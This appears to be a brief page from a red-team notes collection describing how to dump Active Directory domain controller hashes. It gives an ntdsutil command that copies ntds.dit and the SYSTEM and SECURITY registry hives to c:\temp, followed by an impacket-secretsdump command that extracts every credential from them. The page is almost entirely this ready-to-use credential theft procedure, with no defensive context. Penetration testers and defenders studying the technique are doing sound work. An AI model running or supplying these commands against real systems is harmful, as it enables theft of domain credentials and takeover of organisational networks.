ntdsutil.exe - no credential required

Dumping Domain Controller Hashes Locally and RemotelyRed Teaming Experiments

CMD> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

# We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:

# Dump all credentials 
Kali> impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

PreviousSecretdump.py NextDiskshadow - No credential required

Last updated 9 months ago